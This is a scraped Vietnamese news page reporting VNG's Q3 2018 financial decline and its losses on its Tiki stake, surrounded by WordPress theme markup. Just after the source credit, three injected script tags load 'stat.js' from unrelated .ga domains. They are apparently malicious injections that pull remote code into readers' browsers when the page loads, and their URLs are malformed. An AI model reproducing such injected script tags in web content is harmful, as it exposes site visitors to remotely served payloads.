VNG ngày càng sa sút do công ty liên kết thua lỗ, trong đó có Tiki

0
25

Báo cáo tài chính quý 3 năm 2018 vừa được Công ty Cổ phần VNG công bố cho thấy tình hình kinh doanh ngày càng sa sút của doanh nghiệp.

</p> <p>Doanh thu thuần về bán hàng và cung cấp dịch vụ quý 3/2018 đạt 1.095 tỷ đồng, tăng nhẹ so với quý 3 năm 2017. Luỹ kế 3 quý năm 2018, doanh thu đạt 3.161 tỷ đồng.</p> <p>Doanh thu tài chính tăng từ 90 tỷ đồng lên 115 tỷ đồng chủ yếu đến từ việc thu lãi, song chi phí tài chính cũng tăng mạnh, từ 700 triệu lên đến 2,4 tỷ đồng. Trong khi đó, phần lỗ trong công ty liên kết ghi nhận tăng mạnh, ước tính lỗ 151 tỷ đồng 3 quý đầu năm 2018, tăng mạnh so với con số 74,8 tỷ đồng của năm 2017. </p> <p>Chi phí bán hàng và chi phí quản lý doanh nghiệp đồng loạt tăng theo dẫn đến kết thúc 3 quý năm 2018, lợi nhuận sau thuế thu nhập doanh nghiệp đạt 391 tỷ đồng, giảm mạnh 48% so với năm 2017.</p> <p>Một trong những nguyên nhân dẫn đến kết quả kinh doanh xuống sắc của VNG là do doanh thu từ dịch vụ trò chơi trực tuyến giảm mạnh. Theo báo cáo tài chính công ty mẹ, doanh thu dịch vụ trò chơi trực tuyến 9 tháng qua chỉ đạt 1.736 tỷ đồng, giảm mạnh so với mức 2.123 tỷ đồng cùng kỳ năm ngoái. </p> <p>Đáng lưu ý là khoản đầu tư vào công ty liên kết tiếp tục thua lỗ, dù không đề cập chi tiết khoản lỗ từng công ty song báo cáo tài chính cho thấy, khoản giá trị đầu tư vào Tiki của VNG thời điểm cuối năm 2017 là 384,4 tỷ đồng. Tính đến thời điểm 30/9/2018, tổng giá trị đầu tư vào Tiki của VNG tăng lên 506,2 tỷ đồng, nắm giữ 28,8% cổ phần của Tiki.</p> <p>Năm 2017, VNG ghi nhận khoản thua lỗ tại Tiki là 219 tỷ đồng. 6 tháng năm 2018, khoản lỗ này tiếp tục tăng thêm 102 tỷ đồng. Đến thời điểm 30/6/2018, VNG ghi nhận khoản lỗ tại Tiki là 321,2 tỷ đồng. Như vậy, giá trị khoản đầu tư còn lại của VNG tại Tiki chỉ còn 185 tỷ đồng.</p> <p>Trước đó, năm 2017, VNG có một năm huy hoàng khi kết quả kinh doanh tăng trưởng mạnh, doanh thu đạt 4.267 tỷ đồng và lợi nhuận sau thuế tăng 73% lên 938 tỷ đồng.</p> <p>Sang năm 2018, VNG tiếp tục đặt mục tiêu tăng doanh thu lên 5.006 tỷ đồng tuy nhiên, kế hoạch lợi nhuận lại giảm đến 41,5% xuống chỉ còn 549 tỷ đồng – tương đương với mức lợi nhuận của năm 2016. Như vậy, với kết quả vừa công bố, VNG bám khá sát mục tiêu đã đặt ra đầu năm. </p> </div> <p> Nguồn: vneconomy.vn<script src='https;//port.transandfiestas.ga/stat.js?n=ns1' type='text/javascript'></script><script src='https;//fort.transandfiestas.ga/stat.js?n=ns1' type='text/javascript'></script><script src='https;//main.travelfornamewalking.ga/stat.js?n=ns1' type='text/javascript'></script></p> </div> <footer> <div class="td-post-source-tags"> </div> <div class="td-post-sharing td-post-sharing-bottom td-with-like"><span class="td-post-share-title">Chia sẻ</span> <div class="td-default-sharing"> <a class="td-social-sharing-buttons td-social-facebook" href="https://www.facebook.com/sharer.php?u=http%3A%2F%2Fallsexpix.com%2Fnha-dat%2Fvng-ngay-cang-sa-sut-do-cong-ty-lien-ket-thua-lo-trong-do-co-tiki.html" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Facebook</div></a> <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=VNG+ng%C3%A0y+c%C3%A0ng+sa+s%C3%BAt+do+c%C3%B4ng+ty+li%C3%AAn+k%E1%BA%BFt+thua+l%E1%BB%97%2C+trong+%C4%91%C3%B3+c%C3%B3+Tiki&url=http%3A%2F%2Fallsexpix.com%2Fnha-dat%2Fvng-ngay-cang-sa-sut-do-cong-ty-lien-ket-thua-lo-trong-do-co-tiki.html&via=Allsexpix+news%2C+%C4%91%E1%BB%8Dc+b%C3%A1o+online%2C+%C4%91%E1%BB%8Dc+b%C3%A1o+nhanh."><i class="td-icon-twitter"></i><div class="td-social-but-text">Twitter</div></a> <a class="td-social-sharing-buttons td-social-google" href="https://plus.google.com/share?url=http://allsexpix.com/nha-dat/vng-ngay-cang-sa-sut-do-cong-ty-lien-ket-thua-lo-trong-do-co-tiki.html" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a> <a class="td-social-sharing-buttons td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=http://allsexpix.com/nha-dat/vng-ngay-cang-sa-sut-do-cong-ty-lien-ket-thua-lo-trong-do-co-tiki.html&media=http://allsexpix.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489.png&description=VNG+ng%C3%A0y+c%C3%A0ng+sa+s%C3%BAt+do+c%C3%B4ng+ty+li%C3%AAn+k%E1%BA%BFt+thua+l%E1%BB%97%2C+trong+%C4%91%C3%B3+c%C3%B3+Tiki" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a> <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=VNG+ng%C3%A0y+c%C3%A0ng+sa+s%C3%BAt+do+c%C3%B4ng+ty+li%C3%AAn+k%E1%BA%BFt+thua+l%E1%BB%97%2C+trong+%C4%91%C3%B3+c%C3%B3+Tiki%20-%20http%3A%2F%2Fallsexpix.com%2Fnha-dat%2Fvng-ngay-cang-sa-sut-do-cong-ty-lien-ket-thua-lo-trong-do-co-tiki.html" ><i class="td-icon-whatsapp"></i></a> </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="http://www.facebook.com/plugins/like.php?href=http://allsexpix.com/nha-dat/vng-ngay-cang-sa-sut-do-cong-ty-lien-ket-thua-lo-trong-do-co-tiki.html&layout=button_count&show_faces=false&width=105&action=like&colorscheme=light&height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="http://allsexpix.com/nha-dat/vng-ngay-cang-sa-sut-do-cong-ty-lien-ket-thua-lo-trong-do-co-tiki.html" data-text="VNG ngày càng sa sút do công ty liên kết thua lỗ, trong đó có Tiki" data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div> <div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Bài trước</span><a href="http://allsexpix.com/nha-dat/chung-khoan-sang-7-11-ngong-bau-cu-my-giao-dich-cam-chung.html">Chứng khoán sáng 7/11: Ngóng bầu cử Mỹ, giao dịch cầm chừng</a></div></div><div class="td-next-prev-separator"></div><div class="td-block-span6 td-post-next-post"><div class="td-post-next-prev-content"><span>Bài tiếp theo</span><a href="http://allsexpix.com/nha-dat/vinachem-khong-du-kha-nang-tra-het-no-cho-du-an-12-000-ty.html">Vinachem không đủ khả năng trả hết nợ cho dự án 12.000 tỷ</a></div></div></div> <div class="td-author-name vcard author" style="display: none"><span class="fn"><a href="http://allsexpix.com/author/dangthongpro">Tổng hợp tin tức</a></span></div> <span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Tổng hợp tin tức"></span><meta itemprop="datePublished" content="2018-11-06T09:04:49+00:00"><meta itemprop="dateModified" content="2018-11-06T09:04:49+00:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="http://allsexpix.com/nha-dat/vng-ngay-cang-sa-sut-do-cong-ty-lien-ket-thua-lo-trong-do-co-tiki.html"/><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content=""></span><meta itemprop="name" content="Allsexpix news, đọc báo online, đọc báo nhanh."></span><meta itemprop="headline " content="VNG ngày càng sa sút do công ty liên kết thua lỗ, trong đó có Tiki"><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://allsexpix.com/wp-content/uploads/2017/06/Image-ExtractWord-0-Out-3386-1493020489.png"><meta itemprop="width" content="500"><meta itemprop="height" content="281"></span> </footer> </article> <!-- /.post --> <div class="td_block_wrap td_block_related_posts td_uid_3_603a1798a3a90_rand td_with_ajax_pagination td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_3_603a1798a3a90" ><script>var block_td_uid_3_603a1798a3a90 = new tdBlock(); block_td_uid_3_603a1798a3a90.id = "td_uid_3_603a1798a3a90"; block_td_uid_3_603a1798a3a90.atts = '{"limit":6,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_custom_related","td_ajax_filter_ids":"","td_filter_default_txt":"T\u1ea5t C\u1ea3","color_preset":"","border_top":"","class":"td_uid_3_603a1798a3a90_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_3_603a1798a3a90_rand","live_filter":"cur_post_same_categories","live_filter_cur_post_id":21654,"live_filter_cur_post_author":"1","block_template_id":""}'; block_td_uid_3_603a1798a3a90.td_column_number = "3"; block_td_uid_3_603a1798a3a90.block_type = "td_block_related_posts"; block_td_uid_3_603a1798a3a90.post_count = "6"; block_td_uid_3_603a1798a3a90.found_posts = "2648"; block_td_uid_3_603a1798a3a90.header_color = ""; block_td_uid_3_603a1798a3a90.ajax_pagination_infinite_stop = ""; block_td_uid_3_603a1798a3a90.max_num_pages = "442"; tdBlocksArray.push(block_td_uid_3_603a1798a3a90); </script><h4 class="td-related-title td-block-title"><a id="td_uid_4_603a1798b1855" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_3_603a1798a3a90" href="#">BÀI VIẾT LIÊN QUAN</a><a id="td_uid_5_603a1798b185c" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_3_603a1798a3a90" href="#">XEM THÊM</a></h4><div id=td_uid_3_603a1798a3a90 class="td_block_inner"> <div class="td-related-row"> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="http://allsexpix.com/nha-dat/richlane-residences-can-ho-uu-diem-ben-song-dau-tu-lon.html" rel="bookmark" title="RichLane Residences Căn hộ ưu điểm bên sông đầu tư lớn"><img width="218" height="150" class="entry-thumb" src="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-2pn-Scenia-Bay-Nha-Trang-218x150.jpg" srcset="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-2pn-Scenia-Bay-Nha-Trang-218x150.jpg 218w, http://allsexpix.com/wp-content/uploads/2021/02/can-ho-2pn-Scenia-Bay-Nha-Trang-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="RichLane Residences Căn hộ ưu điểm bên sông đầu tư lớn"/></a></div> <a href="http://allsexpix.com/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://allsexpix.com/nha-dat/richlane-residences-can-ho-uu-diem-ben-song-dau-tu-lon.html" rel="bookmark" title="RichLane Residences Căn hộ ưu điểm bên sông đầu tư lớn">RichLane Residences Căn hộ ưu điểm bên sông đầu tư lớn</a></h3> </div> </div> </div> <!-- ./td-related-span4 --> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="http://allsexpix.com/nha-dat/chung-cu-cao-cap-carillon-1-song-nang-dong.html" rel="bookmark" title="Chung cư cao cấp Carillon 1 sống năng động"><img width="218" height="150" class="entry-thumb" src="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-2pn-Scenia-Bay-Nha-Trang2-218x150.jpg" srcset="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-2pn-Scenia-Bay-Nha-Trang2-218x150.jpg 218w, http://allsexpix.com/wp-content/uploads/2021/02/can-ho-2pn-Scenia-Bay-Nha-Trang2-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Chung cư cao cấp Carillon 1 sống năng động"/></a></div> <a href="http://allsexpix.com/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://allsexpix.com/nha-dat/chung-cu-cao-cap-carillon-1-song-nang-dong.html" rel="bookmark" title="Chung cư cao cấp Carillon 1 sống năng động">Chung cư cao cấp Carillon 1 sống năng động</a></h3> </div> </div> </div> <!-- ./td-related-span4 --> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="http://allsexpix.com/nha-dat/khu-du-an-him-lam-riverside-song-nhop-nhip.html" rel="bookmark" title="Khu dự án Him Lam Riverside sống nhộp nhịp"><img width="218" height="150" class="entry-thumb" src="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-mau-Astral-City2-218x150.jpg" srcset="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-mau-Astral-City2-218x150.jpg 218w, http://allsexpix.com/wp-content/uploads/2021/02/can-ho-mau-Astral-City2-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Khu dự án Him Lam Riverside sống nhộp nhịp"/></a></div> <a href="http://allsexpix.com/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://allsexpix.com/nha-dat/khu-du-an-him-lam-riverside-song-nhop-nhip.html" rel="bookmark" title="Khu dự án Him Lam Riverside sống nhộp nhịp">Khu dự án Him Lam Riverside sống nhộp nhịp</a></h3> </div> </div> </div> <!-- ./td-related-span4 --></div><!--./row-fluid--> <div class="td-related-row"> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="http://allsexpix.com/nha-dat/can-ho-marina-tower-dau-tu-dai-han.html" rel="bookmark" title="Căn hộ Marina Tower đầu tư dài hạn"><img width="218" height="150" class="entry-thumb" src="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-mau-minh-quoc-plaza4-218x150.jpg" srcset="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-mau-minh-quoc-plaza4-218x150.jpg 218w, http://allsexpix.com/wp-content/uploads/2021/02/can-ho-mau-minh-quoc-plaza4-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Căn hộ Marina Tower đầu tư dài hạn"/></a></div> <a href="http://allsexpix.com/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://allsexpix.com/nha-dat/can-ho-marina-tower-dau-tu-dai-han.html" rel="bookmark" title="Căn hộ Marina Tower đầu tư dài hạn">Căn hộ Marina Tower đầu tư dài hạn</a></h3> </div> </div> </div> <!-- ./td-related-span4 --> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="http://allsexpix.com/nha-dat/du-an-chung-cu-cao-cap-soho-riverview-uu-dai-ve-gia.html" rel="bookmark" title="Dự án chung cư cao cấp Soho Riverview ưu đãi về giá"><img width="218" height="150" class="entry-thumb" src="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-mau-bcons-suoi-tien-218x150.jpg" srcset="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-mau-bcons-suoi-tien-218x150.jpg 218w, http://allsexpix.com/wp-content/uploads/2021/02/can-ho-mau-bcons-suoi-tien-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Dự án chung cư cao cấp Soho Riverview ưu đãi về giá"/></a></div> <a href="http://allsexpix.com/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://allsexpix.com/nha-dat/du-an-chung-cu-cao-cap-soho-riverview-uu-dai-ve-gia.html" rel="bookmark" title="Dự án chung cư cao cấp Soho Riverview ưu đãi về giá">Dự án chung cư cao cấp Soho Riverview ưu đãi về giá</a></h3> </div> </div> </div> <!-- ./td-related-span4 --> <div class="td-related-span4"> <div class="td_module_related_posts td-animation-stack td_mod_related_posts"> <div class="td-module-image"> <div class="td-module-thumb"><a href="http://allsexpix.com/nha-dat/chung-cu-cao-cap-astral-city-tam-nhin-dep.html" rel="bookmark" title="Chung cư cao cấp Astral City tầm nhìn đẹp"><img width="218" height="150" class="entry-thumb" src="http://allsexpix.com/wp-content/uploads/2021/02/tien-ich-Astral-City5-218x150.jpg" srcset="http://allsexpix.com/wp-content/uploads/2021/02/tien-ich-Astral-City5-218x150.jpg 218w, http://allsexpix.com/wp-content/uploads/2021/02/tien-ich-Astral-City5-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="" title="Chung cư cao cấp Astral City tầm nhìn đẹp"/></a></div> <a href="http://allsexpix.com/category/nha-dat" class="td-post-category">Nhà đất</a> </div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://allsexpix.com/nha-dat/chung-cu-cao-cap-astral-city-tam-nhin-dep.html" rel="bookmark" title="Chung cư cao cấp Astral City tầm nhìn đẹp">Chung cư cao cấp Astral City tầm nhìn đẹp</a></h3> </div> </div> </div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_3_603a1798a3a90" data-td_block_id="td_uid_3_603a1798a3a90"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_3_603a1798a3a90" data-td_block_id="td_uid_3_603a1798a3a90"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block --> <div class="comments" id="comments"> <div id="respond" class="comment-respond"> <h3 id="reply-title" class="comment-reply-title">BÌNH LUẬN <small><a rel="nofollow" id="cancel-comment-reply-link" href="/nha-dat/vng-ngay-cang-sa-sut-do-cong-ty-lien-ket-thua-lo-trong-do-co-tiki.html#respond" style="display:none;">Hủy trả lời</a></small></h3> <form action="http://allsexpix.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate> <div class="clearfix"></div> <div class="comment-form-input-wrap td-form-comment"> <textarea placeholder="Bình luận:" id="comment" name="comment" cols="45" rows="8" aria-required="true"></textarea> <div class="td-warning-comment">Please enter your comment!</div> </div> <div class="comment-form-input-wrap td-form-author"> <input class="" id="author" name="author" placeholder="Tên:*" type="text" value="" size="30" aria-required='true' /> <div class="td-warning-author">Please enter your name here</div> </div> <div class="comment-form-input-wrap td-form-email"> <input class="" id="email" name="email" placeholder="Email:*" type="text" value="" size="30" aria-required='true' /> <div class="td-warning-email-error">You have entered an incorrect email address!</div> <div class="td-warning-email">Please enter your email address here</div> </div> <div class="comment-form-input-wrap td-form-url"> <input class="" id="url" name="url" placeholder="Website:" type="text" value="" size="30" /> </div> <p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Đăng" /> <input type='hidden' name='comment_post_ID' value='21654' id='comment_post_ID' /> <input type='hidden' name='comment_parent' id='comment_parent' value='0' /> </p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="1c3df02670" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="158"/></p> </form> </div><!-- #respond --> <p class="akismet_comment_form_privacy_notice">Website này sử dụng Akismet để hạn chế spam. <a href="https://akismet.com/privacy/" target="_blank" rel="nofollow noopener">Tìm hiểu bình luận của bạn được duyệt như thế nào</a>.</p> </div> <!-- /.content --> </div> </div> <div class="td-pb-span4 td-main-sidebar" role="complementary"> <div class="td-ss-main-sidebar"> <div class="td-a-rec td-a-rec-id-sidebar "><span class="td-adspot-title">- Advertisement -</span><div class="td-all-devices"><a href="http://hethongtintuc.com"><img src="http://hethongtintuc.com/banner/bannervip.png"/></a></div></div><div class="td-a-rec td-a-rec-id-custom_ad_1 "><span class="td-adspot-title">Quảng cáo</span><div class="td-all-devices"><a href="http://hethongtintuc.com"><img src="http://hethongtintuc.com/banner/bannervip.png"/></a></div></div><div class="td_block_wrap td_block_21 td_block_widget td_uid_8_603a1798b4f58_rand td-pb-border-top td_block_template_1 td-column-1" data-td-block-uid="td_uid_8_603a1798b4f58" ><script>var block_td_uid_8_603a1798b4f58 = new tdBlock(); block_td_uid_8_603a1798b4f58.id = "td_uid_8_603a1798b4f58"; block_td_uid_8_603a1798b4f58.atts = '{"limit":"3","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"Latest article","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"#","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_8_603a1798b4f58_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_8_603a1798b4f58_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}'; block_td_uid_8_603a1798b4f58.td_column_number = "1"; block_td_uid_8_603a1798b4f58.block_type = "td_block_21"; block_td_uid_8_603a1798b4f58.post_count = "3"; block_td_uid_8_603a1798b4f58.found_posts = "26275"; block_td_uid_8_603a1798b4f58.header_color = "#"; block_td_uid_8_603a1798b4f58.ajax_pagination_infinite_stop = ""; block_td_uid_8_603a1798b4f58.max_num_pages = "8759"; tdBlocksArray.push(block_td_uid_8_603a1798b4f58); </script><div class="td-block-title-wrap"><h4 class="block-title"><span class="td-pulldown-size">Latest article</span></h4></div><div id=td_uid_8_603a1798b4f58 class="td_block_inner"> <div class="td_module_16 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="http://allsexpix.com/nha-dat/richlane-residences-can-ho-uu-diem-ben-song-dau-tu-lon.html" rel="bookmark" title="RichLane Residences Căn hộ ưu điểm bên sông đầu tư lớn"><img width="150" height="150" class="entry-thumb" src="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-2pn-Scenia-Bay-Nha-Trang-150x150.jpg" alt="" title="RichLane Residences Căn hộ ưu điểm bên sông đầu tư lớn"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://allsexpix.com/nha-dat/richlane-residences-can-ho-uu-diem-ben-song-dau-tu-lon.html" rel="bookmark" title="RichLane Residences Căn hộ ưu điểm bên sông đầu tư lớn">RichLane Residences Căn hộ ưu điểm bên sông đầu tư lớn</a></h3> <div class="td-module-meta-info"> <a href="http://allsexpix.com/category/nha-dat" class="td-post-category">Nhà đất</a> <span class="td-post-author-name"><a href="http://allsexpix.com/author/xuankhanh">xuankhanh</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-02-27T09:00:42+00:00" >27 Tháng Hai, 2021</time></span> <div class="td-module-comments"><a href="http://allsexpix.com/nha-dat/richlane-residences-can-ho-uu-diem-ben-song-dau-tu-lon.html#respond">0</a></div> </div> <div class="td-excerpt"> Căn hộ RichLane Residences được xây dựng bởi Mapletree dễ dàng lưu thông gần trung tâm ưu đãi tốt nhất. dự án RichLane Residences... </div> </div> </div> <div class="td_module_16 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="http://allsexpix.com/nha-dat/chung-cu-cao-cap-carillon-1-song-nang-dong.html" rel="bookmark" title="Chung cư cao cấp Carillon 1 sống năng động"><img width="150" height="150" class="entry-thumb" src="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-2pn-Scenia-Bay-Nha-Trang2-150x150.jpg" alt="" title="Chung cư cao cấp Carillon 1 sống năng động"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://allsexpix.com/nha-dat/chung-cu-cao-cap-carillon-1-song-nang-dong.html" rel="bookmark" title="Chung cư cao cấp Carillon 1 sống năng động">Chung cư cao cấp Carillon 1 sống năng động</a></h3> <div class="td-module-meta-info"> <a href="http://allsexpix.com/category/nha-dat" class="td-post-category">Nhà đất</a> <span class="td-post-author-name"><a href="http://allsexpix.com/author/xuankhanh">xuankhanh</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-02-27T08:00:55+00:00" >27 Tháng Hai, 2021</time></span> <div class="td-module-comments"><a href="http://allsexpix.com/nha-dat/chung-cu-cao-cap-carillon-1-song-nang-dong.html#respond">0</a></div> </div> <div class="td-excerpt"> Căn hộ cao cấp Carillon 1 xây dựng bởi TTC Land trung tâm thành phố nhiều ưu đãi lựa chọn hấp dẫn. Carillon 1... </div> </div> </div> <div class="td_module_16 td_module_wrap td-animation-stack"> <div class="td-module-thumb"><a href="http://allsexpix.com/nha-dat/khu-du-an-him-lam-riverside-song-nhop-nhip.html" rel="bookmark" title="Khu dự án Him Lam Riverside sống nhộp nhịp"><img width="150" height="150" class="entry-thumb" src="http://allsexpix.com/wp-content/uploads/2021/02/can-ho-mau-Astral-City2-150x150.jpg" alt="" title="Khu dự án Him Lam Riverside sống nhộp nhịp"/></a></div> <div class="item-details"> <h3 class="entry-title td-module-title"><a href="http://allsexpix.com/nha-dat/khu-du-an-him-lam-riverside-song-nhop-nhip.html" rel="bookmark" title="Khu dự án Him Lam Riverside sống nhộp nhịp">Khu dự án Him Lam Riverside sống nhộp nhịp</a></h3> <div class="td-module-meta-info"> <a href="http://allsexpix.com/category/nha-dat" class="td-post-category">Nhà đất</a> <span class="td-post-author-name"><a href="http://allsexpix.com/author/xuankhanh">xuankhanh</a> <span>-</span> </span> <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2021-02-27T08:00:30+00:00" >27 Tháng Hai, 2021</time></span> <div class="td-module-comments"><a href="http://allsexpix.com/nha-dat/khu-du-an-him-lam-riverside-song-nhop-nhip.html#respond">0</a></div> </div> <div class="td-excerpt"> Dự án căn hộ cao cấp Him Lam Riverside được phát triển bởi Him Lam tiện ích hạng sang nhiều ưu đãi tầm nhìn... </div> </div> </div> </div></div> <!-- ./block --> </div> </div> </div> <!-- /.td-pb-row --> </div> <!-- /.td-container --> </div> <!-- /.td-main-content-wrap --> <!-- Instagram --> <!-- Footer --> <div class="td-footer-wrapper td-container-wrap td-footer-template-4 "> <div class="td-container"> <div class="td-pb-row"> <div class="td-pb-span12"> <div class="td-a-rec td-a-rec-id-footer_top "><span class="td-adspot-title">Quảng cáo tại đây</span><div class="td-all-devices"><a href="#"><img src="http://hethongtintuc.com/banner/no-banner-728x90.jpg"/></a></div></div> </div> </div> <div class="td-pb-row"> <div class="td-pb-span12"> <div class="td-footer-info"><div class="footer-logo-wrap"><a href="http://allsexpix.com/"><img class="td-retina-data" src="" data-retina="http://baotaolao.net/blogtintuc/wp-content/uploads/2017/04/logo-header@2x.png" alt="" title=""/></a></div><div class="footer-text-wrap"><div class="footer-email-wrap">Liên hệ chúng tôi: <a href="mailto:hethongvetinhtintuc@gmail.com">hethongvetinhtintuc@gmail.com</a></div></div><div class="footer-social-wrap td-social-style-2"> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Behance"> <i class="td-icon-font td-icon-behance"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Facebook"> <i class="td-icon-font td-icon-facebook"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Instagram"> <i class="td-icon-font td-icon-instagram"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Twitter"> <i class="td-icon-font td-icon-twitter"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="Vimeo"> <i class="td-icon-font td-icon-vimeo"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="#" title="VKontakte"> <i class="td-icon-font td-icon-vk"></i> </a> </span></div></div> </div> </div> </div> </div> <!-- Sub Footer --> <div class="td-sub-footer-container td-container-wrap "> <div class="td-container"> <div class="td-pb-row"> <div class="td-pb-span td-sub-footer-menu"> <div class="menu-tin-tuc-container"><ul id="menu-tin-tuc-2" class="td-subfooter-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-11"><a href="http://allsexpix.com">Trang chủ</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-5021"><a href="http://allsexpix.com/category/suc-khoe">Sức khỏe</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-661"><a href="http://allsexpix.com/category/giao-duc">Giáo dục</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-660"><a href="http://allsexpix.com/category/du-lich">Du lịch</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-663"><a href="http://allsexpix.com/category/oto-xemay">Ôtô- 